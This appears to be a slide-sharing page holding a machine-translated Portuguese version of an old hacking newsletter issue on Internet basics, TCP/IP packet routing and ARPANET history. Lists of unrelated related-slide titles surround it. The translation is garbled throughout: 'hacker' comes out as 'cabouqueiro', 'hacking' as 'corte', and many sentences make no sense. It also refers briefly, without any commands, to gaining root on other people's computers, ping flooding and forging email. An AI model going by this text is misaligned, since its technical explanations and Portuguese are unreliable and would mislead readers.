 

Mais procurados (13)

Curso de redes aula 1
Curso de redes aula 1Curso de redes aula 1
Curso de redes aula 1
 
Sniffers Parte 2
Sniffers   Parte 2Sniffers   Parte 2
Sniffers Parte 2
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
 
Sniffers
SniffersSniffers
Sniffers
 
Cloud computing
Cloud computingCloud computing
Cloud computing
 
Tcp transmission control protocol e ip internet protocol
Tcp  transmission control protocol e ip internet protocolTcp  transmission control protocol e ip internet protocol
Tcp transmission control protocol e ip internet protocol
 
Vpn alan-rafael
Vpn alan-rafaelVpn alan-rafael
Vpn alan-rafael
 
Linux Redes e Servidores - guia pratico
Linux  Redes e Servidores - guia pratico Linux  Redes e Servidores - guia pratico
Linux Redes e Servidores - guia pratico
 
Aula de Redes para concursos
Aula de Redes para concursosAula de Redes para concursos
Aula de Redes para concursos
 
Tecnologias de informação e comunicação
Tecnologias de informação e comunicaçãoTecnologias de informação e comunicação
Tecnologias de informação e comunicação
 
Etec ai -30- internet
Etec   ai -30- internetEtec   ai -30- internet
Etec ai -30- internet
 
Guardando dados na nuvem
Guardando dados na nuvemGuardando dados na nuvem
Guardando dados na nuvem
 
34 tutorial sobre_rede-cabos-grimpagem-hub_switch
34 tutorial sobre_rede-cabos-grimpagem-hub_switch34 tutorial sobre_rede-cabos-grimpagem-hub_switch
34 tutorial sobre_rede-cabos-grimpagem-hub_switch
 

Destaque

Capacitacion andamios
Capacitacion andamiosCapacitacion andamios
Capacitacion andamios
Ruben Benito
 
Producto 2 equipo 3
Producto 2 equipo 3Producto 2 equipo 3
Producto 2 equipo 3
TERESITA64
 
Clase 11 cap 4 2
Clase 11 cap 4 2Clase 11 cap 4 2
Clase 11 cap 4 2
cesilvauvg
 
Procesoauditoria
ProcesoauditoriaProcesoauditoria
Procesoauditoria
Ruben Benito
 
Ley general de acceso de las mujeres a una vida libre de violencia legisla...
 Ley general de acceso de las mujeres a una vida libre de violencia   legisla... Ley general de acceso de las mujeres a una vida libre de violencia   legisla...
Ley general de acceso de las mujeres a una vida libre de violencia legisla...
Programa Universitario de Derechos Humanos UNAM
 
wateenGebouw
wateenGebouwwateenGebouw
wateenGebouwklaasdej
 
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
Jesse Budlong
 
Mercadoavanzado.blogspot.com 2010 06-01_archive.html
Mercadoavanzado.blogspot.com 2010 06-01_archive.htmlMercadoavanzado.blogspot.com 2010 06-01_archive.html
Mercadoavanzado.blogspot.com 2010 06-01_archive.html
Arquitecto bogota
 
Manual de buenas_practicas_de_prescripcion_imprenta1
Manual de buenas_practicas_de_prescripcion_imprenta1Manual de buenas_practicas_de_prescripcion_imprenta1
Manual de buenas_practicas_de_prescripcion_imprenta1
Ruben Benito
 

Destaque (9)

Capacitacion andamios
Capacitacion andamiosCapacitacion andamios
Capacitacion andamios
 
Producto 2 equipo 3
Producto 2 equipo 3Producto 2 equipo 3
Producto 2 equipo 3
 
Clase 11 cap 4 2
Clase 11 cap 4 2Clase 11 cap 4 2
Clase 11 cap 4 2
 
Procesoauditoria
ProcesoauditoriaProcesoauditoria
Procesoauditoria
 
Ley general de acceso de las mujeres a una vida libre de violencia legisla...
 Ley general de acceso de las mujeres a una vida libre de violencia   legisla... Ley general de acceso de las mujeres a una vida libre de violencia   legisla...
Ley general de acceso de las mujeres a una vida libre de violencia legisla...
 
wateenGebouw
wateenGebouwwateenGebouw
wateenGebouw
 
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
The WalkUP Wake-Up Call: Atlanta The Poster Child of Sprawl Builds a Walkable...
 
Mercadoavanzado.blogspot.com 2010 06-01_archive.html
Mercadoavanzado.blogspot.com 2010 06-01_archive.htmlMercadoavanzado.blogspot.com 2010 06-01_archive.html
Mercadoavanzado.blogspot.com 2010 06-01_archive.html
 
Manual de buenas_practicas_de_prescripcion_imprenta1
Manual de buenas_practicas_de_prescripcion_imprenta1Manual de buenas_practicas_de_prescripcion_imprenta1
Manual de buenas_practicas_de_prescripcion_imprenta1
 

Semelhante a H4dummies (translated to portuguese)

Apresentação sobre internet
Apresentação sobre internetApresentação sobre internet
Apresentação sobre internet
darlonagro
 
Como a internet funciona
Como a internet funcionaComo a internet funciona
Como a internet funciona
Pedro Neto
 
Curso completo de_redes
Curso completo de_redesCurso completo de_redes
Curso completo de_redes
mateusjardim
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
Robson Levi
 
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
Diego Caceres
 
Redes guia prático 2ª edição - carlos e. morimoto
Redes guia prático 2ª edição - carlos e. morimotoRedes guia prático 2ª edição - carlos e. morimoto
Redes guia prático 2ª edição - carlos e. morimoto
Fortaleza Metro
 
Aps apresentação do microsoft power point
Aps apresentação do microsoft power pointAps apresentação do microsoft power point
Aps apresentação do microsoft power point
Gilnei Vieira da Silva
 
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
Campannhas Valerio
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Heber Gutenberg
 
STC NG5 DR4 António Santos
STC NG5 DR4 António SantosSTC NG5 DR4 António Santos
STC NG5 DR4 António Santos
Alberto Casaca
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
Marco Guimarães
 
trabalho de tic
trabalho de tic trabalho de tic
trabalho de tic
martaesandraefernando
 
Curso de redes wi telecom.ppt
Curso de redes wi telecom.pptCurso de redes wi telecom.ppt
Curso de redes wi telecom.ppt
Elismar Oliveira
 
Curso de Informática para Concurso PC-PR
Curso de Informática para Concurso PC-PRCurso de Informática para Concurso PC-PR
Curso de Informática para Concurso PC-PR
Estratégia Concursos
 
Trabalho informatica 20 06
Trabalho informatica 20 06Trabalho informatica 20 06
Trabalho informatica 20 06
Rafaeu123
 
Configurando+uma+rede
Configurando+uma+redeConfigurando+uma+rede
Configurando+uma+rede
Marcelo Area Leao
 
Configurando uma rede
Configurando uma redeConfigurando uma rede
Configurando uma rede
Leocanario2013
 
Afinal, qual a diferença entre roteador, hub e switch produtos
Afinal, qual a diferença entre roteador, hub e switch    produtosAfinal, qual a diferença entre roteador, hub e switch    produtos
Afinal, qual a diferença entre roteador, hub e switch produtos
Danylla de Medeiros Medeiros
 
Tecnologias de informação e comunicação
Tecnologias de informação e comunicaçãoTecnologias de informação e comunicação
Tecnologias de informação e comunicação
telmaberto
 
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdf
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdfIntrodução ao Pentest (Daniel Moreno) (By- Slayer).pdf
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdf
xererenhosdominaram
 

Semelhante a H4dummies (translated to portuguese) (20)

Apresentação sobre internet
Apresentação sobre internetApresentação sobre internet
Apresentação sobre internet
 
Como a internet funciona
Como a internet funcionaComo a internet funciona
Como a internet funciona
 
Curso completo de_redes
Curso completo de_redesCurso completo de_redes
Curso completo de_redes
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01-141027091745-convers...
 
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
Baixebr.org linux+ +redes+e+servidores+-+guia+pratico+2ªedição+por+carlos+e+m...
 
Redes guia prático 2ª edição - carlos e. morimoto
Redes guia prático 2ª edição - carlos e. morimotoRedes guia prático 2ª edição - carlos e. morimoto
Redes guia prático 2ª edição - carlos e. morimoto
 
Aps apresentação do microsoft power point
Aps apresentação do microsoft power pointAps apresentação do microsoft power point
Aps apresentação do microsoft power point
 
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
Guia pratico-rede-e-servidores-linux-120904130641-phpapp01-140507215427-phpapp01
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
 
STC NG5 DR4 António Santos
STC NG5 DR4 António SantosSTC NG5 DR4 António Santos
STC NG5 DR4 António Santos
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
 
trabalho de tic
trabalho de tic trabalho de tic
trabalho de tic
 
Curso de redes wi telecom.ppt
Curso de redes wi telecom.pptCurso de redes wi telecom.ppt
Curso de redes wi telecom.ppt
 
Curso de Informática para Concurso PC-PR
Curso de Informática para Concurso PC-PRCurso de Informática para Concurso PC-PR
Curso de Informática para Concurso PC-PR
 
Trabalho informatica 20 06
Trabalho informatica 20 06Trabalho informatica 20 06
Trabalho informatica 20 06
 
Configurando+uma+rede
Configurando+uma+redeConfigurando+uma+rede
Configurando+uma+rede
 
Configurando uma rede
Configurando uma redeConfigurando uma rede
Configurando uma rede
 
Afinal, qual a diferença entre roteador, hub e switch produtos
Afinal, qual a diferença entre roteador, hub e switch    produtosAfinal, qual a diferença entre roteador, hub e switch    produtos
Afinal, qual a diferença entre roteador, hub e switch produtos
 
Tecnologias de informação e comunicação
Tecnologias de informação e comunicaçãoTecnologias de informação e comunicação
Tecnologias de informação e comunicação
 
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdf
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdfIntrodução ao Pentest (Daniel Moreno) (By- Slayer).pdf
Introdução ao Pentest (Daniel Moreno) (By- Slayer).pdf
 

Mais de Alvaro Gomes

Museu nacional de história natural e da ciência
Museu nacional de história natural e da ciênciaMuseu nacional de história natural e da ciência
Museu nacional de história natural e da ciência
Alvaro Gomes
 
Luís Vaz de Camões Vida e Obras
Luís Vaz de Camões Vida e Obras Luís Vaz de Camões Vida e Obras
Luís Vaz de Camões Vida e Obras
Alvaro Gomes
 
Ética Deontológica Técnico Administrativo
Ética Deontológica Técnico AdministrativoÉtica Deontológica Técnico Administrativo
Ética Deontológica Técnico Administrativo
Alvaro Gomes
 
Revolução Industrial - O Ponto de Viragem
Revolução Industrial - O Ponto de ViragemRevolução Industrial - O Ponto de Viragem
Revolução Industrial - O Ponto de Viragem
Alvaro Gomes
 
Linux Commandos Cheat
Linux Commandos CheatLinux Commandos Cheat
Linux Commandos Cheat
Alvaro Gomes
 
Flash android using livesuit
Flash android using livesuitFlash android using livesuit
Flash android using livesuit
Alvaro Gomes
 
Websearch
WebsearchWebsearch
Websearch
Alvaro Gomes
 
13 Things the Government doesn´t want you to know
13 Things the Government doesn´t want you to know13 Things the Government doesn´t want you to know
13 Things the Government doesn´t want you to know
Alvaro Gomes
 
Hackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injectorHackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injector
Alvaro Gomes
 
Como transformar o router thomson num print server
Como transformar o router thomson num print serverComo transformar o router thomson num print server
Como transformar o router thomson num print server
Alvaro Gomes
 
Drivers ADB Android
Drivers ADB AndroidDrivers ADB Android
Drivers ADB Android
Alvaro Gomes
 
ROM china original (Shenzhen)
ROM china original (Shenzhen)ROM china original (Shenzhen)
ROM china original (Shenzhen)
Alvaro Gomes
 
Reinstalar actualizar el sistema operativo android
Reinstalar actualizar el sistema operativo androidReinstalar actualizar el sistema operativo android
Reinstalar actualizar el sistema operativo android
Alvaro Gomes
 
Hackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injectorHackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injector
Alvaro Gomes
 
Algoritmos e estructura de dados
Algoritmos e estructura de dadosAlgoritmos e estructura de dados
Algoritmos e estructura de dados
Alvaro Gomes
 
HTML - Guia5
HTML - Guia5HTML - Guia5
HTML - Guia5
Alvaro Gomes
 
HTML - Guia4
HTML - Guia4HTML - Guia4
HTML - Guia4
Alvaro Gomes
 
HTML - Guia 3
HTML - Guia 3HTML - Guia 3
HTML - Guia 3
Alvaro Gomes
 
HTML - Guia 1 e 2
HTML - Guia 1 e 2HTML - Guia 1 e 2
HTML - Guia 1 e 2
Alvaro Gomes
 
Html - capitulo 12
Html - capitulo 12Html - capitulo 12
Html - capitulo 12
Alvaro Gomes
 

Mais de Alvaro Gomes (20)

Museu nacional de história natural e da ciência
Museu nacional de história natural e da ciênciaMuseu nacional de história natural e da ciência
Museu nacional de história natural e da ciência
 
Luís Vaz de Camões Vida e Obras
Luís Vaz de Camões Vida e Obras Luís Vaz de Camões Vida e Obras
Luís Vaz de Camões Vida e Obras
 
Ética Deontológica Técnico Administrativo
Ética Deontológica Técnico AdministrativoÉtica Deontológica Técnico Administrativo
Ética Deontológica Técnico Administrativo
 
Revolução Industrial - O Ponto de Viragem
Revolução Industrial - O Ponto de ViragemRevolução Industrial - O Ponto de Viragem
Revolução Industrial - O Ponto de Viragem
 
Linux Commandos Cheat
Linux Commandos CheatLinux Commandos Cheat
Linux Commandos Cheat
 
Flash android using livesuit
Flash android using livesuitFlash android using livesuit
Flash android using livesuit
 
Websearch
WebsearchWebsearch
Websearch
 
13 Things the Government doesn´t want you to know
13 Things the Government doesn´t want you to know13 Things the Government doesn´t want you to know
13 Things the Government doesn´t want you to know
 
Hackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injectorHackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injector
 
Como transformar o router thomson num print server
Como transformar o router thomson num print serverComo transformar o router thomson num print server
Como transformar o router thomson num print server
 
Drivers ADB Android
Drivers ADB AndroidDrivers ADB Android
Drivers ADB Android
 
ROM china original (Shenzhen)
ROM china original (Shenzhen)ROM china original (Shenzhen)
ROM china original (Shenzhen)
 
Reinstalar actualizar el sistema operativo android
Reinstalar actualizar el sistema operativo androidReinstalar actualizar el sistema operativo android
Reinstalar actualizar el sistema operativo android
 
Hackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injectorHackeando facebook com wireshark e cookie injector
Hackeando facebook com wireshark e cookie injector
 
Algoritmos e estructura de dados
Algoritmos e estructura de dadosAlgoritmos e estructura de dados
Algoritmos e estructura de dados
 
HTML - Guia5
HTML - Guia5HTML - Guia5
HTML - Guia5
 
HTML - Guia4
HTML - Guia4HTML - Guia4
HTML - Guia4
 
HTML - Guia 3
HTML - Guia 3HTML - Guia 3
HTML - Guia 3
 
HTML - Guia 1 e 2
HTML - Guia 1 e 2HTML - Guia 1 e 2
HTML - Guia 1 e 2
 
Html - capitulo 12
Html - capitulo 12Html - capitulo 12
Html - capitulo 12
 

H4dummies (translated to portuguese)

  • 1. Corte para manequins Índices do volume 2: Internet para manequins Linux! Introdução ao TCP/IP Surfar portuário! __________________________________________________________ GUIA (na maior parte) AO CORTE INOFENSIVO Vol. 2 número 1 Internet para manequins -- saltar isto se você é um feiticeiro de Unix. Mas se você lê em você começ um pouco mais de kewl que corta instruções. __________________________________________________________ Os seis guias (na maior parte) ao corte inofensivo de Vol. 1 saltaram imediatamente como-em cortar truques. Mas se você é como mim, todos aqueles detalhes de portos probing e de jogo com hipóteses e de sibilar abaixo dos anfitriões começ pouco dizzying. Assim como sobre o travamento de nossa respiração, estando para trás e revendo o que é esse nós é jogar com? Uma vez que nós começ os princípios sob o controle, nós então podemos transportar-se sobre o corte sério. Também, eu wrestling com minha consciência sobre se começar dar-lhe instruções passo a passo em como ganhar a raiz alcanço computadores de outros povos'. O anjo pequeno em meu ombro direito sussurra, “ganhando a raiz sem permissão em computadores do outro pessoa não é agradável. Assim não dizer a povos como fazê- lo.” O diabo pequeno em meu ombro esquerdo diz, “Carolyn, todos estes cabouqueiros pensa que você não sabe o nothin'! PROOVE a eles você sabe rachar- se!” O anjo pequeno diz, “se qualquer um guia da leitura (na maior parte) ao corte inofensivo amarra para fora este truque, você pôde conseguir no problema com a lei para que a conspiração danifique outros povos' os computadores.” O diabo pequeno diz, “mas, Carolyn, diz a povos como rachar-se na raiz e pensarão que você é KEWL!” Está tão aqui o negócio. Nesta e nas próximas introduções do guia (na maior parte) inofensivo ao corte eu dir-lhe-ei diversas maneiras de começ entrado como o superuser no cliente de raiz de alguns computadores de anfitrião do Internet. Mas as instruções deixarão uma coisa ou dois à imaginação. Minha teoria é que se você é disposto vadear com o todo o isto, você não é provavelmente um daqueles presunçosos baratos do cabouqueiro das emoções que usariam este conhecimento para fazer algo destrutivo que o aterraria na cadeia. ***************************** Ponta técnica: Se você deseja se transformar um cabouqueiro do *serious*, você precisará o linux (uma variedade do freeware de Unix) em seu PC. Uma razão é que então você pode se rachar na raiz legalmente tudo que você quer -- em seu próprio computador. As batidas certas que esforçam-se ao redor em alguma outra pessoa o computador para descobrir somente que o que você o pensamento era a raiz era uma armadilha inteligente ajustada e o sysadmin e o FBI ri de você toda a maneira de encarcerar.
  • 2. O linux pode ser instalado em um PC com tão pouco quanto 386 um processador central, um RAM de somente 2 Mb e tão pouco quanto MB 20 do disco rígido. Você precisará de reformat seu disco rígido. Quando alguns povos instalarem com sucesso o linux sem trashing seu material de DOS/Windows, não contar na obtenção afastado com ela. Apoio, apoio, apoio! ***************************** ***************************** Você pode ir encarcerar o aviso: A rachadura na raiz em alguma outra pessoa computador e o slammer transforma-se uma possibilidade definitiva. Pensar sobre isto: quando você ver uma notícia sobre algum cabouqueiro que começ rebentado, como frequentemente você reconhecem o nome? O busto o mais atrasado está sendo feito como frequentemente a alguém famoso, como o Tangent escuro ou o se7en ou o Emmanuel Goldstein? Como sobre, como, nunca! Isso é porque os cabouqueiros realmente bons figuram para fora como não fazer o material estúpido. Aprendem como rachar-se em computadores para o desafio intelectual e figurar para fora como fazer computadores seguros dos intrusos. Não fazem touro sua maneira na raiz e para fazer uma confusão das coisas, que tenda a inspirar sysadmins chamar as bobinas. ********************************* Observação emocionante: É que fura demasiado para cortar apenas em sua própria máquina do linux? Cair dentro lá. O IRA Winkler da associação nacional da segurança de computador, o decano Garlick do laboratório da dinâmica do espaço da universidade de estado de Utá e eu estão trabalhando em setting-up hack.net, um lugar onde será legal quebrar em computadores. Não somente que, nós estamos procurando os patrocinadores que dão concessões e bolsas de estudos de dinheiro àquelas que mostram as grandes habilidades de corte. Faz agora esse soam como mais phun do que a cadeia? ***************************** Assim, deixar-nos saltar em nossos princípios de corte tutoriais com um olhar na anarquia maravilhoso que é o Internet. Anotar que estes guias (na maior parte) ao foco de corte inofensivo no Internet. Isso é porque há muitas maneiras legais de cortar no Internet. Também, há sobre 10 milhões destes computadores prontamente hackable no Internet, e o número cresce diário. Princípios do Internet Ninguém possui o Internet. Ninguém funcionamentos ele. Nunca planeou-se ser o que é hoje. Apenas aconteceu, a conseqüência do mutante de uma experiência do Defense Advanced Research Projects Agency de 1969 E.U. Sobras anárquicas deste sistema amarradas junto porque seus usuários obedecem voluntàriamente algumas réguas básicas. Estas réguas podem ser resumidas em duas palavras: Unix e TCP/IP (com um assentimento ao UUCP). Se você compreende, compreender verdadeiramente Unix e TCP/IP (e UUCP), você transformar-se-á uma natação dos peixes no mar do Cyberspace, um Uberhacker entre presunçosos do cabouqueiro, um mestre do universo do Internet. Para começ técnico, o Internet é uma rede distribuída mundial do computador/comunicações mantida unida por um padrão comum das comunicações, pelo Transmission Control Protocol/Internet Protocol (TCP/IP) e por um bocado do
  • 3. UUCP. Estes padrões permitem que qualquer um enganche acima de um computador ao Internet, que se transforma então um outro nó nesta rede do Internet. Tudo que é necessário é começ um internet address atribuído ao computador novo, que é sabido então porque um Internet “anfitrião,” e laço em uma ligação de comunicações do Internet. Estas ligações estão agora disponíveis em quase todas as partes do mundo. Se você usa um serviço online de seu computador pessoal, você, também, pode temporariamente transformar-se parte do Internet. Há duas maneiras principais de enganchar até um serviço online. Há a conexão da batata do cybercouch que cada newbie usa. Exige um ponto apontar (PPP) ou SLIPconnection, que permitam que você funcione retratos bonitos com seu web browser. Se você começ alguma sorte do software empacotado de seu ISP, dá-lhe automaticamente esta sorte da conexão. Ou você pode conectar com um terminal emulator a um anfitrião do Internet. Este programa pode ser algo tão simples quanto Windows 3.1 programa “terminal” sob o ícone dos “acessórios”. Uma vez que você discou dentro e conectou você é apenas um outro terminal neste computador central. Não lhe dará retratos bonitos. Esta conexão será similar a o que você começ em um BBS antiquado. Mas se você sabe usar este tipo da conexão, poderia mesmo dar-lhe o acesso da raiz a esse anfitrião. Mas como o computador de anfitrião você uso é unido ao Internet? Estará funcionando alguma variedade do sistema de exploração de Unix. Desde que Unix é tão fácil de se adaptar a quase todo o computador, este significa que quase qualquer computador pode se transformar um anfitrião do Internet. Por exemplo, eu entro às vezes no Internet através de um anfitrião que seja um computador do Indigo de Silicon Graphics na universidade de estado de Utá. Seu internet address é fantasia.idec.sdl.usu.edu. Este é um computador aperfeiçoado para o trabalho da animação de computador, mas pode igualmente operar-se como um anfitrião do Internet. Em outras ocasiões o ponto de entrada usado pode ser pegasus.unm.edu, que é um modelo 370 de IBM RS 6000. Este é um computador aperfeiçoado para a pesquisa na universidade de New mexico. Algum computador que puder funcionar o software necessário -- qual é basicamente o sistema de exploração de Unix -- tem um modem, e é amarrado a uma ligação de comunicações do Internet, pode transformar-se um nó do Internet. Mesmo um PC pode transformar-se um anfitrião do Internet funcionando um dos sabores do linux de Unix. Após o ajuste acima com linux você pode arranjar com o ISP de sua escolha para lig permanentemente o ao Internet. De facto, muitos ISPs não usam nada os PCes mais do que conectados que funcionam o linux! Em conseqüência, a toda a computação, armazenamento de dados, e emissão, recepção e transmissão das mensagens no Internet são segurados pelos milhões dos computadores de muitos tipos e possuídos por companhias incontáveis, por instituições educativas, por entidades governamentais e mesmo por indivíduos. Cada um destes computadores tem um endereço individual que o permita de ser alcangado através do Internet se enganchado até uma ligação de comunicações apropriada. Este endereço pode ser representado em duas maneiras: como um nome ou um número.
  • 4. As ligações de comunicações do Internet igualmente são possuídas e mantidas na mesma forma anárquica que os anfitriões. Cada proprietário de um anfitrião do Internet é responsável para encontrar e pagar por uma ligação de comunicações que começ esse anfitrião amarrado dentro com pelo menos outro um anfitrião. As ligações de comunicações podem ser tão simples quanto uma linha telefónica, uma ligação de dados sem fio tal como dados de pacote digitais celulares, ou tão complicadas quanto uma ligação de alta velocidade da fibra óptica. Contanto que a ligação de comunicações puder usar o TCP/IP ou o UUCP, pode caber no Internet. Assim a rede cresce sem a coordenação total. Um novo proprietario de uma necessidade do anfitrião do Internet começ somente a permissão amarrar em uma ligação de comunicações outro a um anfitrião. Alternativamente, se o fornecedor da ligação de comunicações decide este anfitrião é, por exemplo, um abrigo para spammer, pode cortar este “local desonesto” fora do Internet. O local desonesto então deve snooker alguma outra ligação de comunicações em amarrá-la no Internet outra vez. A maneira mais destes computadores interconectados e de trabalho das ligações de comunicações é com a língua comum do protocolo do TCP/IP. Basicamente, o TCP/IP quebra toda a comunicação do Internet em “pacotes discretos.” Cada pacote inclui a informação em como distribuir a, de correcção de erros, e os endereços do remetente e do receptor. A idéia é que se um pacote é perdido, o remetente o saberá e o enviará novamente o pacote. Cada pacote é lanç então no Internet. Esta rede pode automaticamente escolher uma rota do nó ao nó para cada pacote using o que quer que está disponível naquele tempo, e remonta os pacotes na mensagem completa no computador a que foi endereçada. Estes pacotes podem seguir rotas tortuosas. Por exemplo, um pacote pode ir de um nó em Boston a Amsterdão e de volta aos E.U. para o destino final em Houston, quando um outro pacote da mesma mensagem pôde ser distribuído através de Tokyo e de Atenas, e assim por diante. Geralmente, entretanto, as ligações de comunicações não são quase tão torturous. As ligações de comunicações podem incluir fibras ópticas, linhas telefónicas e satélites. A força desta rede comutável por blocos é que a maioria de mensagens começ automaticamente completamente apesar do engarrafamento pesado da mensagem e muitas das ligações de comunicações que estão para fora - de - serviço. A desvantagem é que as mensagens podem simplesmente desaparecer dentro do sistema. Igualmente pode ser difícil alcangar computadores desejados se ligações de comunicações demais são não disponíveis naquele tempo. Entretanto, todas estas características maravilhosas são igualmente profunda hackable. O Internet é robusto bastante sobreviver -- assim sua reivindicação dos inventores -- mesmo guerra nuclear. Contudo é igualmente tão fraco que com somente um pouco da instrução, é possível aprender como spoof seriamente o sistema (email forjado) ou mesmo põr temporariamente fora da comissão computadores de anfitrião do Internet do outro pessoa (a inundação que sibila, por exemplo.) De um lado, os encabeçamentos nos pacotes que carreg o corte de comandos dão afastado a informação de cliente de que um cabouqueiro se está operando. Para for duro esconder perfeitamente quando no Internet.
  • 5. É esta tensão entre estes poder e vigor e fraqueza e potencial para a confusão que faz ao Internet um campo de jogos do cabouqueiro. Por exemplo, ESTÁ AQUI SEU Tip que do CABOUQUEIRO VOCÊ TEM ESPERADO ESTA EDIÇÃO: ftp://ftp.secnet.com Este ftp site foi afixado na lista de BUGTRAQ, que é dedicada ao exame de buracos em a segurança de Unix. O monitor é Aleph um, que é um Uberhacker genuíno. Se você quer subscrever ao BUGTRAQ, o email LISTSERV@netspace.org com mensagem “subscreve BUGTRAQ.” Agora, de volta aos princípios do Internet. História do Internet Como mencionado acima, o Internet era nascido como um esforço avançado E.U. da agência dos projectos de investigação em 1969. Seus inventores chamaram-no ARPANET. Mas por causa de seu valor na investigação científica, o National Science Foundation dos E.U. tomou-a sobre em 1983. Mas sobre os anos desde então evoluiu gradualmente longe de toda a única fonte de controle. Em abril de 1995 o NSF cortou as últimas cordas de avental. O Internet é funcionado agora por ninguém. Apenas acontece e cresce fora dos esforços daqueles que jogam com ele e se esforçam com o software e a ferragem. Nada como este tem acontecido nunca antes. Nós temos agora um sistema informático com uma vida do seus próprios. Nós, como cabouqueiros, fazemos parte grande do motor da mutação que mantem o Internet evoluir e crescer mais forte. Nós igualmente fazemos parte grande do sistema imunitário desta criatura exótica. A idéia original de ARPANET era projectar um computador e uma rede de comunicações que se tornassem eventualmente tão redundantes, tão um robusto, e um tão capaz de operar-se sem controle centralizado, que poderia mesmo sobreviver à guerra nuclear. O que igualmente aconteceu era esse ARPANET evoluído ser que sobreviveu ao fim do financiamento do governo sem mesmo uma resposta em seu crescimento. Assim sua prole anárquica, o Internet, sucedeu além dos sonhos os mais selvagens de seus arquitetos originais. O Internet cresceu explosiva, sem a extremidade na vista. Em seu início como ARPANET ele prendeu somente 4 anfitriões. Um quarto de alta velocidade mais tarde, em 1984, conteve somente 1000 anfitriões. Mas durante os próximos 5 anos este número cresceu decuplamente a 10.000 (1989). Sobre os seguintes 4 anos cresceu outro decuplamente a 1 milhão (1993). Dois anos mais tarde, no fim de 1995, o Internet foi estimado para ter pelo menos 6 milhão computadores de anfitrião. Há provavelmente sobre 10 milhões agora. Não parece estar nenhuma extremidade na vista contudo ao crescimento incrível desta criança do mutante de ARPANET. De facto, um interesse levantado pelo crescimento exponencial no Internet é que a demanda pode eventualmente capacidade distante do outrace. Porque agora nenhuma entidade possui ou controla o Internet, se a capacidade das ligações de comunicações entre nós é demasiado pequena, e era se tornar atolada seriamente, pôde ser difícil reparar o problema. Por exemplo, em 1988, Robert Morris, Jr. desencadeou um “vírus” - dactilografar o programa no Internet conhecido geralmente como de “o sem-fim Morris.” Este vírus
